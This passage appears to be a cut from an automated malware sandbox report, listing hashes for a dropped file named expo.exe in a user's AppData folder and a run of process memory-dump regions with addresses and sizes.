  SHA256: 5ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
  SHA512: 5196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
- \Users\Admin\AppData\Roaming\expo.exe
  MD5: 419179d921ed1c875e2c690ee521d516
  SHA1: 12750f63f89e8086d59948ebe3664473364f72dc
  SHA256: 99b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
  SHA512: 823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
- memory/392-101-0x0000000000440000-0x0000000000459000-memory.dmp (Filesize: 100KB)
- memory/392-91-0x000000000041E792-mapping.dmp
- memory/392-90-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
- memory/392-93-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
- memory/392-95-0x0000000000820000-0x0000000000821000-memory.dmp (Filesize: 4KB)
- memory/392-100-0x00000000003F0000-0x00000000003F5000-memory.dmp (Filesize: 20KB)
- memory/392-102-0x00000000004A0000-0x00000000004A3000-memory.dmp (Filesize: 12KB)
- memory/612-53-0x000000002FFB1000-0x000000002FFB4000-memory.dmp (Filesize: 12KB)
- memory/612-103-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
- memory/612-55-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
- memory/612-54-0x0000000071B11000-0x0000000071B13000-memory.dmp (Filesize: 8KB)
- memory/680-65-0x0000000004D10000-0x0000000004D11000-memory.dmp (Filesize: 4KB)
- memory/680-62-0x0000000000000000-mapping.dmp
- memory/680-63-0x0000000001030000-0x0000000001031000-memory.dmp (Filesize: 4KB)
- memory/680-66-0x00000000006B0000-0x00000000006D1000-memory.dmp (Filesize: 132KB)
- memory/680-67-0x0000000004D11000-0x0000000004D12000-memory.dmp (Filesize: 4KB)
- memory/896-57-0x0000000000000000-mapping.dmp
- memory/896-58-0x0000000075651000-0x0000000075653000-memory.dmp (Filesize: 8KB)
- memory/896-60-0x0000000002470000-0x00000000030BA000-memory.dmp (Filesize: 12.3MB)
- memory/896-59-0x0000000002470000-0x00000000030BA000-memory.dmp (Filesize: 12.3MB)
- memory/896-61-0x0000000002470000-0x00000000030BA000-memory.dmp (Filesize: 12.3MB)
- memory/1328-68-0x0000000000000000-mapping.dmp
- memory/1388-96-0x0000000000000000-mapping.dmp
- memory/1556-98-0x0000000000000000-mapping.dmp
- memory/1728-89-0x0000000001ED0000-0x0000000001ED1000-memory.dmp (Filesize: 4KB)
- memory/1728-84-0x00000000001C0000-0x00000000001C1000-memory.dmp (Filesize: 4KB)
- memory/1728-80-0x0000000000000000-mapping.dmp
- memory/1800-56-0x0000000000000000-mapping.dmp
- memory/1948-71-0x0000000000000000-mapping.dmp
- memory/1948-86-0x0000000004C70000-0x0000000004C71000-memory.dmp (Filesize: 4KB)
- memory/1948-78-0x0000000004D91000-0x0000000004D92000-memory.dmp (Filesize: 4KB)
- memory/1948-74-0x0000000000800000-0x0000000000801000-memory.dmp (Filesize: 4KB)
- memory/1948-82-0x0000000004840000-0x000000000484B000-memory.dmp (Filesize: 44KB)
- memory/1948-76-0x0000000004D90000-0x0000000004D91000-memory.dmp (Filesize: 4KB)
- memory/1976-69-0x0000000000000000-mapping.dmp